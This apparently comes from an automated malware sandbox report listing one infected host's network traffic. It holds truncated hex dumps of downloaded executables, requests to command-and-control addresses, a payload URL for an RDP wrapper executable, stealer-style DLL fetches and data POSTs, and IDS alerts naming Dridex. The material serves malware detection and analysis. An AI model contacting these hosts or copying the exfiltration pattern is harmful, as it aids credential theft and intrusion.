Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 23:38:12 GMTContent-Type: application/octet-streamContent-Length: 385064Last-Modified: Thu, 26 Sep 2024 22:09:48 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5dbac-5e028"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 db f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 cd 05 00 53 00 00 00 00 e0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 ba 05 00 28 26 00 00 00 00 06 00 0c 00 00 00 b0 cc 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 ae 05 00 00 20 00 00 00 b0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 e0 05 00 00 06 00 00 00 b2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 06 00 00 02 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ce 05 00 00 00 00 00 48 00 00 00 02 00 05 00 80 bc 05 00 30 10 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 79 1c 59 59 6c 14 76 5e 87 dc f4 35 66 85 48 24 b2 ce 02 9f f7 2f fa 57 cb 61 b6 7a 7a f0 df 35 4f 10 9b 37 1c cd 12 66 9e 17 53 d5 6c 5c f1 52 42 af 6b 08 35 e6 ea 8e 7f 45 71 7f 85 08 89 95 76 f5 df 0e a5 d6 fc 42 00 1a 12 66 8a 8c a2 0d cc d6 dd fd 9a b7 bc c6 39 76 02 fa f3 3b 28 cc 46 d9 81 20 0a 4a 2a b2 67 cc 69 96 ae 28 1e d1 d6 18 42 b3 42 cb 4d 9a 73 8f a0 c3 3c 0d c8 75 62 e5 20 1b 6c f5 5d b3 87 96 ab bd 51 67 83 b4 d5 5c c3 42 63 2a 84 b1 06 91 e4 24 95 19 a0 1f c7 f8 aa f8 66 56 47 5a 94 db 00 2e f4 cb 98 c5 a0 c0 c1 38 d1 da 99 e2 a3 9c 0e 6c 48 3b 21 f8 0a 17 22 ae e3 f0 fb 82 f0 70 98 55 4f 04 38 d7 59 22 c7 e2 fb f1 64 f2 d1 be 5c eb 0e a2 64 44 22 b3 73 6d 7d cb 63 23 15 3f e1 34 3f 13 f1 59 23 dc 04 b7 a4 e3 17 cb 30 bb 1b 1d ff 56 53 cd bd 1d 58 bb 10 7c 89 e7 0c c4 9d 47 16 2e cb 67 ac 3a 21 72 4d 5b 7e 1b 01 94 65 bf 42 70 d5 e0 62 7a a7 7b 84 1c 13 a4 60 35 1d cc f3 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 23:38:14 GMTContent-Type: application/octet-streamContent-Length: 413224Last-Modified: Thu, 26 Sep 2024 22:09:34 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5db9e-64e28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed da f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3b 06 00 53 00 00 00 00 40 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 28 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 b0 3a 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 1c 06 00 00 20 00 00 00 1e 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 40 06 00 00 06 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 3c 06 00 00 00 00 00 48 00 00 00 02 00 05 00 80 2a 06 00 30 10 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa 88 91 bf 5e 83 38 3d 2e 1f 51 05 cf 88 76 20 41 c7 95 33 5b 52 f9 4a 2a f9 82 5f c1 c3 ff 82 66 8e 1a 39 be 5c 6c 9b f9 76 43 23 53 73 6e 42 7e af 45 c2 d5 7e e6 69 03 87 37 0a 7d 2b f1 56 fc 0f ec 23 c9 db 38 17 bf 66 d1 23 58 57 9c b5 06 ce 62 88 e7 bd 91 11 28 94 81 83 aa 92 c9 c2 8e d2 87 dd ec a8 98 87 c8 07 8b 3c 4f b6 ac bf ed bf 07 19 c0 31 1b 24 cc 3d 55 4e 38 dd 29 a8 19 4c 4c 7f 0c af ed 28 4b fe 03 12 d6 b5 2c 72 c8 ca d7 b3 ae c5 9b 25 39 15 4c 9f 59 0e 3d 30 c4 b5 89 54 34 83 26 8a bd 1f 9d 1e 64 ee d4 ba 2e 0a 28 55 17 81 d3 ce 92 27 3d 22 80 85 94 28 3e e0 64 98 7f 2b f2 0c 39 32 a5 1a ac 70 38 c5 31 9a 90 50 61 5c 71 b7 ee e5 d8 af 5d 58 96 2f 61 fc 40 30 43 ff 50 51 8c b9 d4 42 fc 07 ed 76 89 17 36 04 04 f7 d0 6c 65 32 07 b1 95 85 34 49 33 02 b4 02 02 ce d3 d2 50 a3 43 3a 11 09 b2 76 98 7d 89 51 c9 77 70 11 89 53 28 41 ec 51 67 16 27 16 0b 4e 09 04 5f 58 f5 6d 76 67 ba 1c d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 23:38:17 GMTContent-Type: application/octet-streamContent-Length: 73728Last-Modified: Thu, 26 Sep 2024 23:36:16 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5eff0-12000"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8f 99 ab c7 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 06 01 00 00 18 00 00 00 00 00 00 fe 23 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac 23 01 00 4f 00 00 00 00 40 01 00 17 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 04 01 00 00 20 00 00 00 06 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 17 14 00 00 00 40 01 00 00 16 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 01 00 00 02 00 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 23 01 00 00 00 00 00 48 00 00 00 02 00 05 00 00 fd 00 00 ac 26 00 00 03 00 02 00 06 00 00 06 0c 2d 00 00 f4 cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 23 00 00 06 2a 1e 02 28 1a 00 00 0a 2a 36 02 7c 07 00 00 04 03 28 30 00 00 0a 2a 56 73 31 00 00 0a 72 08 02 00 70 28 02 00 00 06 28 32 00 00 0a 2a 4a 73 31 00 00 0a 02 73 33 00 00 0a 03 28 34 00 00 0a 2a 5a 72 b0 02 00 70 28 02 00 00 06 28 11 00 00 06 02 6f 45 00 00 0a 2a b2 02 28 4e 00 00 0a 3a 01 00 00 00 2a 72 16 03 00 70 28 02 00 00 06 02 72 30 03 00 70 28 02 00 00 06 28 4f 00 00 0a 28 10 00 00 06 2a e6 72 b0 03 00 70 28 02 00 00 06 28 11 00 00 06 72 e2 03 00 70 28 02 00 00 06 6f 45 00 00 0a 3a 0b 00 00 00 72 14 04 00 70 28 02 00 00 06 2a 72 e2 03 00 70 28 02 00 00 06 2a aa 72 a7 06 00 70 28 02 00 00 06 02 7b 0a 00 00 04 72 a7 06 00 70 28 02 00 00 06 28 58 00 00 0a 6f 59 00 00 0a 28 5a 00 00 0a 2a 62 02 3a 0b 00 00 00 72 5a 07 00 70 28 02 00 00 06 2a 02 6f 5b 00 00 0a 2a 13 30 04 00 6e 00 00 00 01 00 00 11 00 02 28 0a 00 00 0a 0a 73 0b 00 00 0a 28 0c 00 00 0a 72 01 00 00 70 6f 0d 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 23:38:18 GMTContent-Type: application/octet-streamContent-Length: 1785344Last-Modified: Thu, 26 Sep 2024 12:36:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f55533-1b3e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 1b 00 00 04 00 00 17 f6 1b 00 03 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 f8 12 00 00 00 60 05 00 ed 7b 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 fc 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 c3 04 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 12 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 7c 1e 00 00 00 30 04 00 00 20 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 50 04 00 00 14 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 4f 00 00 00 70 04 00 00 00 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 f8 12 00 00 00 c0 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 04 00 00 00 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 04 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 5e 00 00 00 00 05 00 00 60 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 ed 7b 16 00 00 60 05 00 00 7c 16 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 17 00 00 00 00 00 00 cc 16 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 58Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: Joe Sandbox View	IP Address: 104.21.77.130 104.21.77.130
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AS-PUBMATICUS AS-PUBMATICUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49715 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49717 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49713 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49712 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49711 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49716 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49714 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49719 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49721 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49720 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49718 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49722 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49723 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49724 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49726 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49725 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49729 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49731 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49727 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49732 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49728 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49733 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49735 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49734 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49738 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49741 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49745 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49755 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49757 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49760 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49756 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49759 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49758 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49763 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49761 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49762 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:49754 -> 5.75.211.162:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 6353Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKFCFBKFCFBFIDGCGDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
